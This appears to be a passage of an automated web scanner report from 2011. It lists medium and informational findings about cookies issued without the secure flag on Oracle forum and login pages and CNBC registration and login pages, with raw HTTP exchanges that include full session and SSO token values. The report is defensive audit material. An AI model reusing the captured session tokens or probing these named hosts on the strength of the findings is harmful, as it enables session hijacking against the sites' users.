The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

7.1. https://forums.oracle.com/forums/adfAuthentication previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/adfAuthentication

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/adfAuthentication?success_url=/main.jspa?categoryID=84 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; BIGipServerforums_prod_pool=51417741.20480.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-10g
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~5D09C635ADF7FCDB0B22A013B7D8A7E733E380B6F6B6FECC2930922D66B8A284C6CAC96F2D43EDA75D75999112956B40FF55201353C5FF03211190E58DE009348F6D3456BA825C6590982D6D5B75724AC9C814653CA5B4274DF09863BB77CA0770B13679F52272A0D1E2FE7CA3525FF488B1976FEF2DF74B823F474CB693675BC66F11D8776FC908E5FFD08D5EEEC4F5C523677FFE230719283092BCC55C29D4C61D4D7016E82800B744931F8E3DF98D4ED662639D486F749A20DED6E2B1D87CCF2068965103F4675905FB43A8DED28469B093EC4D09E6686DE6852A4B2608F1844974BE4B33DFF805A1E7EEB276CEA7
Osso-Paranoid: false
Content-Type: text/html
Content-Length: 0
Date: Tue, 06 Sep 2011 16:14:09 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

7.2. https://forums.oracle.com/forums/category.jspa previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/category.jspa

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums
BIGipServerforums_prod_pool=202412685.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/category.jspa?categoryID=18 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

7.3. https://forums.oracle.com/forums/guestsettings!default.jspa previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/guestsettings!default.jspa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=8d92100c30d7caf68638f82744638e708dcb2aab2d2d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/guestsettings!default.jspa HTTP/1.1
Host: forums.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 17:07:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=8d92100c30d7caf68638f82744638e708dcb2aab2d2d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums
Content-Length: 36286

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>

<title>OTN Discussion Forums : Forum Settings</title>
<meta http-equiv="content-type" conte
...[SNIP]...

7.4. https://forums.oracle.com/forums/index.jspa previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/index.jspa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/index.jspa?cat=1 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-10g
Content-Language: en-US
Location: https://forums.oracle.com/forums/main.jspa?categoryID=84
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 16:13:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums
Content-Length: 246

<HTML><HEAD><TITLE>Redirect to http://forums.oracle.com/forums/main.jspa?categoryID=84</TITLE></HEAD><BODY><A HREF="http://forums.oracle.com/forums/main.jspa?categoryID=84">http://forums.oracle.com/fo
...[SNIP]...

7.5. https://forums.oracle.com/forums/login!withRedirect.jspa previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/login!withRedirect.jspa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/login!withRedirect.jspa HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; BIGipServerforums_prod_pool=51417741.20480.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-10g
Content-Language: en-US
Location: https://forums.oracle.com/forums/adfAuthentication?success_url=/main.jspa?categoryID=84
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 16:14:08 GMT
Connection: keep-alive
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums
Content-Length: 339

<HTML><HEAD><TITLE>Redirect to http://forums.oracle.com/forums/adfAuthentication?success_url=/main.jspa?categoryID=84</TITLE></HEAD><BODY><A HREF="http://forums.oracle.com/forums/adfAuthentication?suc
...[SNIP]...

7.6. https://forums.oracle.com/forums/main.jspa previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://forums.oracle.com
Path:	/forums/main.jspa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343589432; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=51417741.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Content-Length: 246459
Date: Tue, 06 Sep 2011 16:13:42 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>

<title>OTN Discussion Forums : Forum Home</title>
<meta http-equiv="content-type" content="
...[SNIP]...

7.7. https://register.cnbc.com/forgotPassword.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://register.cnbc.com
Path:	/forgotPassword.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=3903DB621D7BD6523413306545DD8633; Path=/
pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forgotPassword.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=3903DB621D7BD6523413306545DD8633; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/
Content-Length: 85618

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<title>Reset Password</title>
<link href="/css/member_center_sytles.css" rel="stylesheet" typ
...[SNIP]...

7.8. https://register.cnbc.com/memberCenter.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://register.cnbc.com
Path:	/memberCenter.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=EB56D589D26668AFFB39D13706936E94; Path=/
pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:29 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /memberCenter.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:01:29 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=EB56D589D26668AFFB39D13706936E94; Path=/
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:29 GMT; path=/

7.9. https://register.cnbc.com/registerUser.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://register.cnbc.com
Path:	/registerUser.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0B252CD2AC1891E8F5AE500FFDA5AC28; Path=/
pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registerUser.do?iframe=yes&source=register HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=EB56D589D26668AFFB39D13706936E94

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=0B252CD2AC1891E8F5AE500FFDA5AC28; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/
Content-Length: 53350

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...

7.10. https://login.cnbc.com/cas/logout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/logout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cas/logout HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:04:31 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/
Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO2=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO3=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ws=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: snas=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_member_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_session_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_pass_hash=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_sna=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_enc=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://www.cnbc.com
Content-Language: en
Content-Length: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1

7.11. https://login.oracle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:14:14 GMT
Content-Length: 1214
Content-Type: text/html; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

7.12. https://login.oracle.com/mysso/signon.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/signon.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mysso/signon.jsp HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357
Content-Length: 2822
Cache-Control: max-age=0
